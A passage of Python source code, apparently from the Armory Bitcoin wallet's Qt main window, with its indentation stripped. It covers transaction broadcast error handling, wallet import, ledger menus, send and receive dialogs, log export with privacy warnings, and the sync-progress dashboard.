if dryRun:
#DlgDispTxInfo(pytx, None, self, self).exec_()
return
else:
LOGRAWDATA(pytx.serialize(), logging.INFO)
LOGPPRINT(pytx, logging.INFO)
newTxHash = binary_to_hex(pytx.getHash())
self.broadcasting[newTxHash] = pytx
try:
LOGINFO('Sending Tx, %s', newTxHash)
TheBDM.bdv().broadcastZC(pytx.serialize())
except:
QMessageBox.warning(self, self.tr('Broadcast failed'), self.tr(
'The broadcast process failed unexpectedly. Report this error to '
'the development team if this issue occurs repeatedly', QMessageBox.Ok))
#############################################################################
def zcBroadcastError(self, txHash, errorMsg):
try:
pytx = self.broadcasting[txHash]
except:
return
LOGINFO("Failed to broadcast Tx through P2P")
isTimeoutError = False
errorMsgFromRPC = None
if errorMsg.startswith("tx broadcast timed out"):
isTimeoutError = True
try:
errorMsgFromRPC = TheBDM.bdv().broadcastThroughRPC(pytx.serialize())
if errorMsgFromRPC == "success":
QMessageBox.warning(self, self.tr('Transaction Broadcast'), self.tr(
'Your Transaction failed to broadcast through the P2P layer but '
'successfully broadcasted through the RPC. This can be a symptom '
'of bad node connectivity to the Bitcoin network, or that your '
'node is overwhelmed by network traffic. If you consistently get '
'this warning, report to the developers for assistance with node '
'maintenance.'),
QMessageBox.Ok)
return
except:
LOGERROR("Node RPC is disabled")
LOGERROR('Transaction was not accepted by the Satoshi client')
LOGERROR('Raw transaction:')
LOGRAWDATA(pytx.serialize(), logging.ERROR)
LOGERROR('Transaction details')
LOGPPRINT(pytx, logging.ERROR)
LOGERROR('Failure message: %s' % (errorMsg))
searchstr = binary_to_hex(txHash, BIGENDIAN)
supportURL = 'https://github.com/goatpig/BitcoinArmory/issues'
blkexplURL = BLOCKEXPLORE_URL_TX % searchstr
blkexplURL_short = BLOCKEXPLORE_URL_TX % searchstr[:20]
if not isTimeoutError:
QMessageBox.warning(self, self.tr('Transaction Not Accepted'), self.tr(
'The transaction that you just executed failed with '
'the following error message: <br><br> '
'<b>%1</b>'
'<br><br>'
'<br><br>On time out errors, the transaction may have actually succeeded '
'and this message is displayed prematurely. To confirm whether the '
'the transaction actually succeeded, you can try this direct link '
'to %2: '
'<br><br>'
'<a href="%3">%4...</a>'
'<br><br>'
'If you do not see the '
'transaction on that webpage within one minute, it failed and you '
'should attempt to re-send it. '
'If it <i>does</i> show up, then you do not need to do anything '
'else -- it will show up in Armory as soon as it receives one '
'confirmation. '
'<br><br>If the transaction did fail, it is likely because the fee '
'is too low. Try again with a higher fee. '
'If the problem persists, go to "<i>File</i>" -> '
'"<i>Export Log File</i>" and then attach it to a support '
'ticket at <a href="%5">%5</a>').arg(errorMsg, BLOCKEXPLORE_NAME, blkexplURL, \
blkexplURL_short, supportURL), QMessageBox.Ok)
else:
if errorMsgFromRPC == None:
LOGERROR('Broadcast error: %s' % errorMsg)
QMessageBox.warning(self, self.tr('Transaction Not Accepted'), self.tr(
'The transaction that you just attempted to broadcast has timed out. '
'<br><br>'
'The RPC interface of your node is disabled, therefor Armory cannot '
'use it to gather more information about the timeout. It is '
'recommended that you enable the RPC and try again.'
), QMessageBox.Ok)
else:
LOGERROR('Broadcast error: %s' % errorMsgFromRPC)
QMessageBox.warning(self, self.tr('Transaction Not Accepted'), self.tr(
'The transaction that you just attempted to broadcast has failed with '
'the following error: '
'<br><br><b>%1</b>'
).arg(errorMsgFromRPC), QMessageBox.Ok)
#############################################################################
def warnNoImportWhileScan(self):
extraMsg = ''
if not self.usermode==USERMODE.Standard:
extraMsg = ('<br><br>' + \
self.tr('In the future, you may avoid scanning twice by '
'starting Armory in offline mode (--offline), and '
'perform the import before switching to online mode.'))
QMessageBox.warning(self, self.tr('Armory is Busy'), \
self.tr('Wallets and addresses cannot be imported while Armory is in '
'the middle of an existing blockchain scan. Please wait for '
'the scan to finish. ') + extraMsg, QMessageBox.Ok)
#############################################################################
def execImportWallet(self):
sdm = TheSDM.getSDMState()
bdm = TheBDM.getState()
if sdm in ['BitcoindInitializing', \
'BitcoindSynchronizing'] or \
bdm in [BDM_SCANNING]:
QMessageBox.warning(self, self.tr('Scanning'), self.tr(
'Armory is currently in the middle of scanning the blockchain for '
'your existing wallets. New wallets cannot be imported until this '
'operation is finished.'), QMessageBox.Ok)
return
DlgUniversalRestoreSelect(self, self).exec_()
#############################################################################
def execGetImportWltName(self):
fn = self.getFileLoad('Import Wallet File')
if not os.path.exists(fn):
return
wlt = PyBtcWallet().readWalletFile(fn, verifyIntegrity=False)
wltID = wlt.uniqueIDB58
wlt = None
if self.walletMap.has_key(wltID):
QMessageBox.warning(self, self.tr('Duplicate Wallet!'), self.tr(
'You selected a wallet that has the same ID as one already '
'in your wallet (%1)! If you would like to import it anyway, '
'please delete the duplicate wallet in Armory, first.').arg(wltID), \
QMessageBox.Ok)
return
fname = self.getUniqueWalletFilename(fn)
newpath = os.path.join(ARMORY_HOME_DIR, fname)
LOGINFO('Copying imported wallet to: %s', newpath)
shutil.copy(fn, newpath)
newWlt = PyBtcWallet().readWalletFile(newpath)
newWlt.fillAddressPool()
self.addWalletToApplication(newWlt)
#############################################################################
def digitalBackupWarning(self):
reply = QMessageBox.warning(self, self.tr('Be Careful!'), self.tr(
'<font color="red"><b>WARNING:</b></font> You are about to make an '
'<u>unencrypted</u> backup of your wallet. It is highly recommended '
'that you do <u>not</u> ever save unencrypted wallets to your regular '
'hard drive. This feature is intended for saving to a USB key or '
'other removable media.'), QMessageBox.Ok | QMessageBox.Cancel)
return (reply==QMessageBox.Ok)
#############################################################################
def execAddressBook(self):
if TheBDM.getState()==BDM_SCANNING:
QMessageBox.warning(self, self.tr('Blockchain Not Ready'), self.tr(
'The address book is created from transaction data available in '
'the blockchain, which has not finished loading. The address '
'book will become available when Armory is online.'), QMessageBox.Ok)
elif TheBDM.getState() in (BDM_UNINITIALIZED,BDM_OFFLINE):
QMessageBox.warning(self, self.tr('Blockchain Not Ready'), self.tr(
'The address book is created from transaction data available in '
'the blockchain, but Armory is currently offline. The address '
'book will become available when Armory is online.'), QMessageBox.Ok)
else:
if len(self.walletMap)==0:
QMessageBox.warning(self, self.tr('No wallets!'), self.tr('You have no wallets so '
'there is no address book to display.'), QMessageBox.Ok)
return
DlgAddressBook(self, self, None, None, None).exec_()
#############################################################################
def getUniqueWalletFilename(self, wltPath):
root,fname = os.path.split(wltPath)
base,ext = os.path.splitext(fname)
if not ext=='.wallet':
fname = base+'.wallet'
currHomeList = os.listdir(ARMORY_HOME_DIR)
newIndex = 2
while fname in currHomeList:
# If we already have a wallet by this name, must adjust name
base,ext = os.path.splitext(fname)
fname='%s_%02d.wallet'%(base, newIndex)
newIndex+=1
if newIndex==99:
raise WalletExistsError('Cannot find unique filename for wallet.'
'Too many duplicates!')
return fname
#############################################################################
def addrViewDblClicked(self, index, wlt):
uacfv = lambda x: self.updateAddressCommentFromView(self.wltAddrView, self.wlt)
#############################################################################
def dblClickLedger(self, index):
if index.column()==LEDGERCOLS.Comment:
self.updateTxCommentFromView(self.ledgerView)
else:
self.showLedgerTx()
#############################################################################
def showLedgerTx(self):
row = self.ledgerView.selectedIndexes()[0].row()
txHash = str(self.ledgerView.model().index(row, LEDGERCOLS.TxHash).data().toString())
wltID = str(self.ledgerView.model().index(row, LEDGERCOLS.WltID).data().toString())
txtime = unicode(self.ledgerView.model().index(row, LEDGERCOLS.DateStr).data().toString())
pytx = None
txHashBin = hex_to_binary(txHash)
cppTx = TheBDM.bdv().getTxByHash(txHashBin)
if cppTx.isInitialized():
pytx = PyTx().unserialize(cppTx.serialize())
pytx.setRBF(cppTx.isRBF())
if pytx==None:
QMessageBox.critical(self, self.tr('Invalid Tx'), self.tr(
'The transaction you requested be displayed does not exist in '
'Armory\'s database. This is unusual...'), QMessageBox.Ok)
return
DlgDispTxInfo( pytx, self.walletMap[wltID], self, self, txtime=txtime).exec_()
#############################################################################
def showContextMenuLedger(self):
menu = QMenu(self.ledgerView)
if len(self.ledgerView.selectedIndexes())==0:
return
row = self.ledgerView.selectedIndexes()[0].row()
wltID = str(self.ledgerView.model().index(row, LEDGERCOLS.WltID).data().toString())
txHash = str(self.ledgerView.model().index(row, LEDGERCOLS.TxHash).data().toString())
txHash = hex_switchEndian(txHash)
amount, flag = self.ledgerView.model().index(row, LEDGERCOLS.Amount).data().toFloat()
rbf = self.ledgerView.model().index(row, LEDGERCOLS.optInRBF).data().toBool()
issts = self.ledgerView.model().index(row, LEDGERCOLS.toSelf).data().toBool()
flagged = rbf and (amount < 0 or issts)
if flagged:
actBump = menu.addAction(self.tr("Bump Fee"))
actViewTx = menu.addAction(self.tr("View Details"))
actViewBlkChn = menu.addAction(self.tr("View on %1").arg(BLOCKEXPLORE_NAME))
actComment = menu.addAction(self.tr("Change Comment"))
actCopyTxID = menu.addAction(self.tr("Copy Transaction ID"))
actOpenWallet = menu.addAction(self.tr("Open Relevant Wallet"))
action = menu.exec_(QCursor.pos())
if action==actViewTx:
self.showLedgerTx()
elif action==actViewBlkChn:
try:
DlgBrowserWarn(BLOCKEXPLORE_URL_TX % txHash).exec_()
except:
LOGEXCEPT('Failed to open webbrowser')
QMessageBox.critical(self, self.tr('Could not open browser'), self.tr(
'Armory encountered an error opening your web browser. To view '
'this transaction on blockchain.info, please copy and paste '
'the following URL into your browser: '
'<br><br>%1').arg(BLOCKEXPLORE_URL_TX % txHash), QMessageBox.Ok)
elif action==actCopyTxID:
clipb = QApplication.clipboard()
clipb.clear()
clipb.setText(txHash)
elif action==actComment:
self.updateTxCommentFromView(self.ledgerView)
elif action==actOpenWallet:
DlgWalletDetails(self.getSelectedWallet(), self.usermode, self, self).exec_()
elif flagged and action==actBump:
txHash = hex_switchEndian(txHash)
self.bumpFee(wltID, txHash)
#############################################################################
def getSelectedWallet(self):
wltID = None
if len(self.walletMap) > 0:
wltID = self.walletMap.keys()[0]
wltSelect = self.walletsView.selectedIndexes()
if len(wltSelect) > 0:
row = wltSelect[0].row()
wltID = str(self.walletsView.model().index(row, WLTVIEWCOLS.ID).data().toString())
# Starting the send dialog with or without a wallet
return None if wltID == None else self.walletMap[wltID]
def clickSendBitcoins(self):
if TheBDM.getState() in (BDM_OFFLINE, BDM_UNINITIALIZED):
QMessageBox.warning(self, self.tr('Offline Mode'), self.tr(
'Armory is currently running in offline mode, and has no '
'ability to determine balances or create transactions. '
'<br><br>'
'In order to send coins from this wallet you must use a '
'full copy of this wallet from an online computer, '
'or initiate an "offline transaction" using a watching-only '
'wallet on an online computer.'), QMessageBox.Ok)
return
elif TheBDM.getState()==BDM_SCANNING:
QMessageBox.warning(self, self.tr('Armory Not Ready'), self.tr(
'Armory is currently scanning the blockchain to collect '
'the information needed to create transactions. This typically '
'takes between one and five minutes. Please wait until your '
'balance appears on the main window, then try again.'), \
QMessageBox.Ok)
return
if len(self.walletMap)==0:
reply = QMessageBox.information(self, self.tr('No Wallets!'), self.tr(
'You cannot send any bitcoins until you create a wallet and '
'receive some coins. Would you like to create a wallet?'), \
QMessageBox.Yes | QMessageBox.No)
if reply==QMessageBox.Yes:
self.startWalletWizard()
else:
DlgSendBitcoins(self.getSelectedWallet(), self, self).exec_()
#############################################################################
def uriSendBitcoins(self, uriDict):
# Because Bitcoin Core doesn't store the message= field we have to assume
# that the label field holds the Tx-info. So we concatenate them for
# the display message
uri_has = lambda s: uriDict.has_key(s)
haveLbl = uri_has('label')
haveMsg = uri_has('message')
newMsg = ''
if haveLbl and haveMsg:
newMsg = uriDict['label'] + ': ' + uriDict['message']
elif not haveLbl and haveMsg:
newMsg = uriDict['message']
elif haveLbl and not haveMsg:
newMsg = uriDict['label']
descrStr = self.tr('You just clicked on a "bitcoin:" link requesting bitcoins '
'to be sent to the following address:<br> ')
descrStr += self.tr('<br>--<b>Address</b>:\t%1 ').arg(uriDict['address'])
#if uri_has('label'):
#if len(uriDict['label'])>30:
#descrStr += '(%s...)' % uriDict['label'][:30]
#else:
#descrStr += '(%s)' % uriDict['label']
amt = 0
if uri_has('amount'):
amt = uriDict['amount']
amtstr = coin2str(amt, maxZeros=1)
descrStr += self.tr('<br>--<b>Amount</b>:\t%1 BTC').arg(amtstr)
if newMsg:
if len(newMsg)>60:
descrStr += self.tr('<br>--<b>Message</b>:\t%1...').arg(newMsg[:60])
else:
descrStr += self.tr('<br>--<b>Message</b>:\t%1').arg(newMsg)
uriDict['message'] = newMsg
if not uri_has('amount'):
descrStr += (self.tr('<br><br>There is no amount specified in the link, so '
'you can decide the amount after selecting a wallet to use '
'for this transaction. '))
else:
descrStr += self.tr('<br><br><b>The specified amount <u>can</u> be changed</b> on the '
'next screen before hitting the "Send" button. ')
if len(self.walletMap)==0:
reply = QMessageBox.information(self, self.tr('No Wallets!'), self.tr(
'You just clicked on a "bitcoin:" link to send money, but you '
'currently have no wallets! Would you like to create a wallet '
'now?'), QMessageBox.Yes | QMessageBox.No)
if reply==QMessageBox.Yes:
self.startWalletWizard()
return False
else:
dlg = DlgSendBitcoins(self.getSelectedWallet(), self, self)
dlg.frame.prefillFromURI(uriDict)
dlg.exec_()
return True
#############################################################################
def clickReceiveCoins(self):
loading = None
QAPP.processEvents()
wltID = None
selectionMade = True
if len(self.walletMap)==0:
reply = QMessageBox.information(self, self.tr('No Wallets!'), self.tr(
'You have not created any wallets which means there is '
'nowhere to store your bitcoins! Would you like to '
'create a wallet now?'), \
QMessageBox.Yes | QMessageBox.No)
if reply==QMessageBox.Yes:
self.startWalletWizard()
return
elif len(self.walletMap)==1:
loading = LoadingDisp(self, self)
loading.show()
wltID = self.walletMap.keys()[0]
else:
wltSelect = self.walletsView.selectedIndexes()
if len(wltSelect)>0:
row = wltSelect[0].row()
wltID = str(self.walletsView.model().index(row, WLTVIEWCOLS.ID).data().toString())
dlg = DlgWalletSelect(self, self, self.tr('Receive coins with wallet...'), '', \
firstSelect=wltID, onlyMyWallets=False)
if dlg.exec_():
loading = LoadingDisp(self, self)
loading.show()
wltID = dlg.selectedID
else:
selectionMade = False
if selectionMade:
wlt = self.walletMap[wltID]
wlttype = determineWalletType(wlt, self)[0]
if showRecvCoinsWarningIfNecessary(wlt, self, self):
QAPP.processEvents()
dlg = DlgNewAddressDisp(wlt, self, self, loading)
dlg.exec_()
#############################################################################
def sysTrayActivated(self, reason):
if reason==QSystemTrayIcon.DoubleClick:
self.bringArmoryToFront()
#############################################################################
def bringArmoryToFront(self):
self.show()
self.setWindowState(Qt.WindowActive)
self.activateWindow()
self.raise_()
#############################################################################
def minimizeArmory(self):
LOGDEBUG('Minimizing Armory')
self.hide()
self.sysTray.show()
#############################################################################
def startWalletWizard(self):
walletWizard = WalletWizard(self, self)
walletWizard.exec_()
#############################################################################
def startTxWizard(self, prefill=None, onlyOfflineWallets=False):
txWizard = TxWizard(self, self, self.getSelectedWallet(), prefill, onlyOfflineWallets=onlyOfflineWallets)
txWizard.exec_()
#############################################################################
def exportLogFile(self):
LOGDEBUG('exportLogFile')
if self.logFilePrivacyWarning(wCancel=True):
self.saveCombinedLogFile()
#############################################################################
def logFileTriplePrivacyWarning(self):
return MsgBoxCustom(MSGBOX.Warning, self.tr('Privacy Warning'), self.tr(
'<b><u><font size=3>Wallet Analysis Log Files</font></u></b> '
'<br><br> '
'The wallet analysis logs contain no personally-identifiable '
'information, only a record of errors and inconsistencies '
'found in your wallet file. No private keys or even public '
'keys are included. '
'<br><br>'
'<b><u><font size=3>Regular Log Files</font></u></b>'
'<br><br>'
'The regular log files do not contain any <u>security</u>-sensitive '
'information, but some users may consider the information to be '
'<u>privacy</u>-sensitive. The log files may identify some addresses '
'and transactions that are related to your wallets. It is always '
'recommended you include your log files with any request to the '
'Armory team, unless you are uncomfortable with the privacy '
'implications. '
'<br><br>'
'<b><u><font size=3>Watching-only Wallet</font></u></b> '
'<br><br>'
'A watching-only wallet is a copy of a regular wallet that does not '
'contain any signing keys. This allows the holder to see the balance '
'and transaction history of the wallet, but not spend any of the funds. '
'<br><br> '
'You may be requested to submit a watching-only copy of your wallet '
'to make sure that there is no '
'risk to the security of your funds. You should not even consider '
'sending your '
'watching-only wallet unless it was specifically requested by an '
'Armory representative.'), yesStr="&Ok")
#############################################################################
def logFilePrivacyWarning(self, wCancel=False):
return MsgBoxCustom(MSGBOX.Warning, self.tr('Privacy Warning'), self.tr(
'Armory log files do not contain any <u>security</u>-sensitive '
'information, but some users may consider the information to be '
'<u>privacy</u>-sensitive. The log files may identify some addresses '
'and transactions that are related to your wallets. '
'<br><br> '
'<b>No signing-key data is ever written to the log file</b>. '
'Only enough data is there to help the Armory developers '
'track down bugs in the software, but it may still be considered '
'sensitive information to some users. '
'<br><br>'
'Please do not send the log file to the Armory developers if you '
'are not comfortable with the privacy implications! However, if you '
'do not send the log file, it may be very difficult or impossible '
'for us to help you with your problem.'), wCancel=wCancel, yesStr="&Ok")
#############################################################################
def saveCombinedLogFile(self, saveFile=None):
if saveFile is None:
# TODO: Interleave the C++ log and the python log.
# That could be a lot of work!
defaultFN = 'armorylog_%s.txt' % \
unixTimeToFormatStr(RightNow(),'%Y%m%d_%H%M')
saveFile = self.getFileSave(title='Export Log File', \
ffilter=['Text Files (*.txt)'], \
defaultFilename=defaultFN)
if len(unicode(saveFile)) > 0:
fout = open(saveFile, 'wb')
fout.write(getLastBytesOfFile(ARMORY_LOG_FILE, 256*1024))
fout.write(getLastBytesOfFile(ARMCPP_LOG_FILE, 256*1024))
fout.write(getLastBytesOfFile(ARMDB_LOG_FILE, 256*1024))
fout.close()
LOGINFO('Log saved to %s', saveFile)
#############################################################################
def blinkTaskbar(self):
self.activateWindow()
#############################################################################
def lookForBitcoind(self):
LOGDEBUG('lookForBitcoind')
if TheSDM.satoshiIsAvailable():
return 'Running'
self.setSatoshiPaths()
try:
TheSDM.setupSDM(extraExeSearch=self.satoshiExeSearchPath)
except:
LOGEXCEPT('Error setting up SDM')
pass
if TheSDM.failedFindExe:
return 'StillMissing'
return 'AllGood'
#############################################################################
def executeModeSwitch(self):
LOGDEBUG('executeModeSwitch')
if TheSDM.getSDMState() == 'BitcoindExeMissing':
bitcoindStat = self.lookForBitcoind()
if bitcoindStat=='Running':
result = QMessageBox.warning(self, self.tr('Already running!'), self.tr(
'The Bitcoin software appears to be installed now, but it '
'needs to be closed for Armory to work. Would you like Armory '
'to close it for you?'), QMessageBox.Yes | QMessageBox.No)
if result==QMessageBox.Yes:
self.closeExistingBitcoin()
self.startBitcoindIfNecessary()
elif bitcoindStat=='StillMissing':
QMessageBox.warning(self, self.tr('Still Missing'), self.tr(
'The Bitcoin software still appears to be missing. If you '
'just installed it, then please adjust your settings to point '
'to the installation directory.'), QMessageBox.Ok)
self.startBitcoindIfNecessary()
elif self.doAutoBitcoind and not TheSDM.isRunningBitcoind():
if TheSDM.satoshiIsAvailable():
result = QMessageBox.warning(self, self.tr('Still Running'), self.tr(
'Bitcoin Core is still running. Armory cannot start until '
'it is closed. Do you want Armory to close it for you?'), \
QMessageBox.Yes | QMessageBox.No)
if result==QMessageBox.Yes:
self.closeExistingBitcoin()
self.startBitcoindIfNecessary()
else:
self.startBitcoindIfNecessary()
elif TheBDM.getState() in (BDM_OFFLINE,BDM_UNINITIALIZED):
try:
TheBDM.goOnline()
self.switchNetworkMode(NETWORKMODE.Full)
except Cpp.NoArmoryDBExcept:
self.switchNetworkMode(NETWORKMODE.Offline)
else:
LOGERROR('ModeSwitch button pressed when it should be disabled')
time.sleep(0.3)
self.setDashboardDetails()
#############################################################################
def setupDashboard(self):
LOGDEBUG('setupDashboard')
self.lblBusy = QLabel('')
self.btnModeSwitch = QPushButton('')
self.connect(self.btnModeSwitch, SIGNAL('clicked()'), \
self.executeModeSwitch)
# Will switch this to array/matrix of widgets if I get more than 2 rows
self.lblDashModeSync = QRichLabel('',doWrap=False)
self.lblDashModeSync.setText( self.tr('Node Status'), \
size=4, bold=True, color='Foreground')
self.lblDashModeBuild = QRichLabel('',doWrap=False)
self.lblDashModeScan = QRichLabel('',doWrap=False)
self.lblDashModeSync.setAlignment( Qt.AlignLeft | Qt.AlignVCenter)
self.lblDashModeBuild.setAlignment( Qt.AlignLeft | Qt.AlignVCenter)
self.lblDashModeScan.setAlignment( Qt.AlignLeft | Qt.AlignVCenter)
self.barProgressSync = QProgressBar(self)
self.barProgressBuild = QProgressBar(self)
self.barProgressScan = QProgressBar(self)
self.barProgressSync.setRange(0,100)
self.barProgressScan.setRange(0,100)
twid = relaxedSizeStr(self,'99 seconds')[0]
self.lblTimeLeftSync = QRichLabel('')
self.lblTimeLeftBuild = QRichLabel('')
self.lblTimeLeftScan = QRichLabel('')
self.lblTimeLeftSync.setMinimumWidth(twid)
self.lblTimeLeftScan.setMinimumWidth(twid)
layoutDashMode = QGridLayout()
layoutDashMode.addWidget(self.lblDashModeSync, 2,0)
layoutDashMode.addWidget(self.barProgressSync, 2,1)
layoutDashMode.addWidget(self.lblTimeLeftSync, 2,2)
layoutDashMode.addWidget(self.lblDashModeBuild, 3,0)
layoutDashMode.addWidget(self.barProgressBuild, 3,1)
layoutDashMode.addWidget(self.lblTimeLeftBuild, 3,2)
layoutDashMode.addWidget(self.lblDashModeScan, 4,0)
layoutDashMode.addWidget(self.barProgressScan, 4,1)
layoutDashMode.addWidget(self.lblTimeLeftScan, 4,2)
layoutDashMode.addWidget(self.lblBusy, 0,3, 5,1)
layoutDashMode.addWidget(self.btnModeSwitch, 0,3, 5,1)
self.frmDashModeSub = QFrame()
self.frmDashModeSub.setFrameStyle(STYLE_SUNKEN)
self.frmDashModeSub.setLayout(layoutDashMode)
self.frmDashMode = makeHorizFrame(['Stretch', \
self.frmDashModeSub, \
'Stretch'])
self.lblDashDescr1 = QRichLabel('')
self.lblDashDescr2 = QRichLabel('')
for lbl in [self.lblDashDescr1, self.lblDashDescr2]:
# One textbox above buttons, one below
lbl.setStyleSheet('padding: 5px')
qpal = lbl.palette()
qpal.setColor(QPalette.Base, Colors.Background)
lbl.setPalette(qpal)
lbl.setOpenExternalLinks(True)
# Set up an array of buttons in the middle of the dashboard, to be used
# to help the user install bitcoind.
self.lblDashBtnDescr = QRichLabel('')
self.lblDashBtnDescr.setOpenExternalLinks(True)
BTN,LBL,TTIP = range(3)
self.dashBtns = [[None]*3 for i in range(3)]
self.dashBtns[DASHBTNS.Close ][BTN] = QPushButton(self.tr('Close Bitcoin Process'))
self.dashBtns[DASHBTNS.Browse ][BTN] = QPushButton(self.tr('Open https://bitcoin.org'))
self.dashBtns[DASHBTNS.Settings][BTN] = QPushButton(self.tr('Change Settings'))
# The "Now shutting down" frame
self.lblShuttingDown = QRichLabel('', doWrap=False)
self.lblShuttingDown.setText(self.tr('Preparing to shut down..'), \
size=4, bold=True, color='Foreground')
self.lblShuttingDown.setAlignment(Qt.AlignCenter | Qt.AlignVCenter)
layoutDashExit = QGridLayout()
layoutDashExit.addWidget(self.lblShuttingDown, 0,0, 0, 1)
self.frmDashSubExit = QFrame()
self.frmDashSubExit.setFrameStyle(STYLE_SUNKEN)
self.frmDashSubExit.setLayout(layoutDashExit)
self.frmDashSubExit = makeHorizFrame(['Stretch', \
self.frmDashSubExit, \
'Stretch'])
#####
def openBitcoinOrg():
DlgBrowserWarn('https://bitcoin.org/en/download').exec_()
self.connect(self.dashBtns[DASHBTNS.Close][BTN], SIGNAL('clicked()'), \
self.closeExistingBitcoin)
self.connect(self.dashBtns[DASHBTNS.Browse][BTN], SIGNAL('clicked()'), \
openBitcoinOrg)
self.connect(self.dashBtns[DASHBTNS.Settings][BTN], SIGNAL('clicked()'), \
self.openSettings)
self.dashBtns[DASHBTNS.Close][LBL] = QRichLabel( \
self.tr('Stop existing Bitcoin processes so that Armory can open its own'))
self.dashBtns[DASHBTNS.Browse][LBL] = QRichLabel( \
self.tr('Open browser to Bitcoin webpage to download and install Bitcoin software'))
self.dashBtns[DASHBTNS.Settings][LBL] = QRichLabel( \
self.tr('Open Armory settings window to change Bitcoin software management'))
self.dashBtns[DASHBTNS.Browse][TTIP] = self.createToolTipWidget( self.tr(
'Will open your default browser to https://bitcoin.org where you can '
'download the latest version of Bitcoin Core, and get other information '
'and links about Bitcoin, in general.'))
self.dashBtns[DASHBTNS.Settings][TTIP] = self.createToolTipWidget( self.tr(
'Change Bitcoin Core/bitcoind management settings or point Armory to '
'a non-standard Bitcoin installation'))
self.dashBtns[DASHBTNS.Close][TTIP] = self.createToolTipWidget( self.tr(
'Armory has detected a running Bitcoin Core or bitcoind instance and '
'will force it to exit'))
self.frmDashMgmtButtons = QFrame()
self.frmDashMgmtButtons.setFrameStyle(STYLE_SUNKEN)
layoutButtons = QGridLayout()
layoutButtons.addWidget(self.lblDashBtnDescr, 0,0, 1,3)
for r in range(3):
for c in range(3):
if c==LBL:
wMin = tightSizeNChar(self, 50)[0]
self.dashBtns[r][c].setMinimumWidth(wMin)
layoutButtons.addWidget(self.dashBtns[r][c], r+1,c)
self.frmDashMgmtButtons.setLayout(layoutButtons)
self.frmDashMidButtons = makeHorizFrame(['Stretch', \
self.frmDashMgmtButtons,
'Stretch'])
dashLayout = QVBoxLayout()
dashLayout.addWidget(self.frmDashSubExit)
dashLayout.addWidget(self.frmDashMode)
dashLayout.addWidget(self.lblDashDescr1)
dashLayout.addWidget(self.frmDashMidButtons )
dashLayout.addWidget(self.lblDashDescr2)
dashLayout.addWidget(self.lblDashDescr2)
frmInner = QFrame()
frmInner.setLayout(dashLayout)
self.dashScrollArea = QScrollArea()
self.dashScrollArea.setWidgetResizable(True)
self.dashScrollArea.setWidget(frmInner)
scrollLayout = QVBoxLayout()
scrollLayout.addWidget(self.dashScrollArea)
self.tabDashboard.setLayout(scrollLayout)
self.frmDashSubExit.setVisible(False)
#############################################################################
def closeExistingBitcoin(self):
for proc in psutil.process_iter():
try:
if proc.name().lower() in ['bitcoind.exe','bitcoin-qt.exe',\
'bitcoind','bitcoin-qt']:
killProcess(proc.pid)
time.sleep(2)
return
# If the block above rasises access denied or anything else just skip it
except:
pass
# If got here, never found it
QMessageBox.warning(self, self.tr('Not Found'), self.tr(
'Attempted to kill the running Bitcoin Core/bitcoind instance, '
'but it was not found.'), QMessageBox.Ok)
#############################################################################
def getPercentageFinished(self, maxblk, lastblk):
curr = EstimateCumulativeBlockchainSize(lastblk)
maxb = EstimateCumulativeBlockchainSize(maxblk)
return float(curr)/float(maxb)
#############################################################################
def showShuttingDownMessage(self):
self.isShuttingDown = True
self.mainDisplayTabs.setCurrentIndex(self.MAINTABS.Dash)
self.frmDashSubExit.setVisible(True)
self.frmDashMode.setVisible(False)
self.lblDashDescr1.setVisible(False)
self.frmDashMidButtons.setVisible(False)
self.lblDashDescr2.setVisible(False)
self.lblDashDescr2.setVisible(False)
#############################################################################
def updateSyncProgress(self):
if self.isShuttingDown:
return
sdmState = TheSDM.getSDMState()
sdmStr = TheSDM.getSDMStateStr()
if TheBDM.getState()==BDM_SCANNING:
self.lblDashModeSync.setVisible(False)
self.barProgressSync.setVisible(False)
self.lblTimeLeftSync.setVisible(False)
self.lblDashModeSync.setVisible(self.doAutoBitcoind)
self.barProgressSync.setVisible(self.doAutoBitcoind)
self.barProgressSync.setValue(100)
self.lblTimeLeftSync.setVisible(False)
self.barProgressSync.setFormat('')
self.lblDashModeBuild.setVisible(True)
self.barProgressBuild.setVisible(True)
self.lblTimeLeftBuild.setVisible(True)
self.lblDashModeScan.setVisible(True)
self.barProgressScan.setVisible(True)
self.lblTimeLeftScan.setVisible(False)
phase,pct,tleft,numericProgress = TheBDM.predictLoadTime()
if phase==Cpp.BDMPhase_DBHeaders:
self.lblDashModeBuild.setText( self.tr('Loading Database Headers'), \
size=4, bold=True, color='Foreground')
self.lblDashModeScan.setText( self.tr('Scan Transaction History'), \
size=4, bold=True, color='DisableFG')
self.barProgressBuild.setFormat('%p%')
self.barProgressScan.setFormat('')
self.barProgressBuild.setRange(0,100)
elif phase==Cpp.BDMPhase_OrganizingChain:
self.lblDashModeBuild.setText( self.tr('Organizing Blockchain'), \
size=4, bold=True, color='Foreground')
self.lblDashModeScan.setText( self.tr('Scan Transaction History'), \
size=4, bold=True, color='DisableFG')
self.barProgressBuild.setFormat('')
self.barProgressScan.setFormat('')
self.barProgressBuild.setValue(0)
self.barProgressBuild.setRange(0,0)
self.lblTimeLeftBuild.setVisible(False)
self.lblTimeLeftScan.setVisible(False)
elif phase==Cpp.BDMPhase_BlockHeaders:
self.lblDashModeBuild.setText( self.tr('Reading New Block Headers'), \
size=4, bold=True, color='Foreground')
self.lblDashModeScan.setText( self.tr('Scan Transaction History'), \
size=4, bold=True, color='DisableFG')
self.barProgressBuild.setFormat('%p%')
self.barProgressScan.setFormat('')
self.barProgressBuild.setRange(0,100)
elif phase==Cpp.BDMPhase_BlockData:
self.lblDashModeBuild.setText( self.tr('Building Databases'), \
size=4, bold=True, color='Foreground')
self.lblDashModeScan.setText( self.tr('Scan Transaction History'), \
size=4, bold=True, color='DisableFG')
self.barProgressBuild.setFormat('%p%')
self.barProgressScan.setFormat('')
self.barProgressBuild.setRange(0,100)
elif phase==Cpp.BDMPhase_Rescan:
self.lblDashModeBuild.setText( self.tr('Build Databases'), \
size=4, bold=True, color='DisableFG')
self.lblDashModeScan.setText( self.tr('Scanning Transaction History'), \
size=4, bold=True, color='Foreground')
self.lblTimeLeftBuild.setVisible(False)
self.barProgressBuild.setFormat('')
self.barProgressBuild.setValue(100)
self.barProgressBuild.setRange(0,100)
self.barProgressScan.setFormat('%p%')
elif phase==Cpp.BDMPhase_Balance:
self.lblDashModeBuild.setText( self.tr('Build Databases'), \
size=4, bold=True, color='DisableFG')
self.lblDashModeScan.setText( self.tr('Computing Balances'), \
size=4, bold=True, color='Foreground')
self.barProgressBuild.setFormat('')
self.barProgressScan.setFormat('')
self.barProgressBuild.setValue(0)
self.barProgressBuild.setRange(0,0)
